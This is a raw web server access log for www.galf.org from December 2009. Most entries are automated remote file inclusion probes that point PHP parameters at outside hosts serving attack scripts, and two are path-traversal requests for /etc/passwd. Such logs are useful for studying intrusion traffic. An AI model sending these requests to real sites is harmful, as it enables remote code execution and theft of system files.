72.55.143.249 - - [28/Dec/2009:06:03:51 -0800] "GET /logs/access_091221.log//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [28/Dec/2009:06:03:51 -0800] "GET /logs/access_090615.log//components/com_virtuemart/admin.virtuemart.php?mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:06:04:59 -0800] "GET /include/lib.inc.php?site_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
91.197.127.2 - - [28/Dec/2009:06:06:58 -0800] "GET /logs/access_090622.log HTTP/1.0" 200 1245184 "http://www.galf.org/logs/access_090622.log" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:06:08:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
128.241.54.188 - - [28/Dec/2009:06:08:08 -0800] "GET /logs/access_090921.log/errors.php?error=http://www.swdcourt.com/webboard/id1autoscan.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:09:21 -0800] "GET /logs/access_091012.log/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:09:21 -0800] "GET /index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:09:21 -0800] "GET /logs/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:10:58 -0800] "GET /logs/access_090921.log%20%20//include.php?path[docroot]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:10:58 -0800] "GET /include.php?path[docroot]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:06:11:51 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:11:56 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:11:56 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:11:57 -0800] "GET /logs/access_090706.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:17:53 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:17:53 -0800] "GET /logs/access_090914.log///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:17:57 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:18:05 -0800] "GET /logs/access_090817.log///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:18:07 -0800] "GET /logs/access_091019.log///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:23 -0800] "GET /bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:23 -0800] "GET /logs//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:23 -0800] "GET /logs/access_090629.log//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:23 -0800] "GET /logs/access_090629.log//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:23 -0800] "GET /bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:24 -0800] "GET /logs//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:37 -0800] "GET /logs/access_090629.log%20%20//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:37 -0800] "GET /logs//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:37 -0800] "GET /bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:55 -0800] "GET /bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:56 -0800] "GET /logs/access_090629.log%20%20//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:19:56 -0800] "GET /logs//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:19:59 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:20:00 -0800] "GET /logs/access_090706.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:20:00 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:20:06 -0800] "GET /logs/access_090803.log%20%20//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:20:17 -0800] "GET /logs//errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:20:18 -0800] "GET /errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:20:20 -0800] "GET /logs/access_091221.log%20%20//errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:20:25 -0800] "GET /logs/access_090803.log%20%20//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:20:56 -0800] "GET /logs/access_090706.log///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:20:56 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:20:56 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
201.17.147.44 - - [28/Dec/2009:06:21:15 -0800] "GET /main.php?pag=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
201.17.147.44 - - [28/Dec/2009:06:21:16 -0800] "GET /main.php?pag=./../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "-" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:21:37 -0800] "GET /logs//errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:21:37 -0800] "GET /errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:21:43 -0800] "GET /logs/access_090803.log//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.4.113.98 - - [28/Dec/2009:06:21:45 -0800] "GET /logs/access_090803.log//bkp/content.php?page=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:21:47 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:21:47 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:21:47 -0800] "GET /logs/access_090817.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:22:07 -0800] "GET /logs/access_090706.log///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:22:33 -0800] "GET /index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:22:33 -0800] "GET /logs/access_091012.log/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:22:33 -0800] "GET /logs/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:22:33 -0800] "GET /logs/access_091221.log%20%20//errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:22:33 -0800] "GET /errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:22:33 -0800] "GET /logs//errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:23:21 -0800] "GET /logs/access_091012.log%20%20/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:23:29 -0800] "GET /logs/access_091012.log%20%20/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:23:34 -0800] "GET /logs/access_091214.log%20%20/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:23:45 -0800] "GET /logs/access_091214.log%20%20/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:24:01 -0800] "GET /logs/access_090914.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:24:57 -0800] "GET /logs/access_091221.log//errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:06:26:56 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:27:54 -0800] "GET /logs/access.log/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:27:54 -0800] "GET /logs/access.log/index.php?conteudo=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:06:28:31 -0800] "GET /logs//include.php?path[docroot]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.30.227.243 - - [28/Dec/2009:06:28:31 -0800] "GET /logs/access_090921.log%20%20//include.php?path[docroot]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:28:43 -0800] "GET /logs/access_091221.log//errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:06:29:15 -0800] "GET /logs/access_090629.log//include/lib.inc.php?site_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:06:29:15 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:29:34 -0800] "GET /logs/access_091221.log//errors.php?error=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:31:38 -0800] "GET /logs/access_090914.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:32:27 -0800] "GET /logs/access_091019.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
196.40.83.71 - - [28/Dec/2009:06:33:57 -0800] "GET /logs/access_090525.log//include/lib.inc.php?site_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
202.131.226.52 - - [28/Dec/2009:06:34:02 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [28/Dec/2009:06:34:02 -0800] "GET /logs/access_091221.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [28/Dec/2009:06:34:02 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.118 - - [28/Dec/2009:06:35:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:35:15 -0800] "GET /logs/access_090706.log//include.php?path[docroot]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:35:48 -0800] "GET /OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [28/Dec/2009:06:35:48 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [28/Dec/2009:06:35:53 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [28/Dec/2009:06:35:56 -0800] "GET /OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [28/Dec/2009:06:35:56 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [28/Dec/2009:06:36:01 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.175.29.2 - - [28/Dec/2009:06:37:29 -0800] "GET /logs/access_091019.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/19/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.175.29.2 - - [28/Dec/2009:06:37:29 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/19/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:38:54 -0800] "GET /OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:38:54 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:38:54 -0800] "GET /logs/access_091221.log%20%20//OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:38:55 -0800] "GET /OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:38:55 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [28/Dec/2009:06:38:56 -0800] "GET /logs/access_091221.log%20%20//OLE.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:41:03 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:41:03 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:41:03 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:41:08 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:41:08 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:41:08 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:06:42:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:06:44:48 -0800] "GET /phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:06:44:48 -0800] "GET /logs/access_090622.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:06:44:48 -0800] "GET /logs/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.77 - - [28/Dec/2009:06:44:52 -0800] "GET / HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.195.37.161 - - [28/Dec/2009:06:45:59 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.37.161 - - [28/Dec/2009:06:45:59 -0800] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:46:10 -0800] "GET /logs/access_091221.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:26 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:26 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:26 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:06:46:49 -0800] "GET /logs/access_090706.log//include.php?path[docroot]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:46:53 -0800] "GET /!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:54 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:54 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:55 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:55 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:55 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Dec/2009:06:46:55 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://bagoessss.fileave.com/aa.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
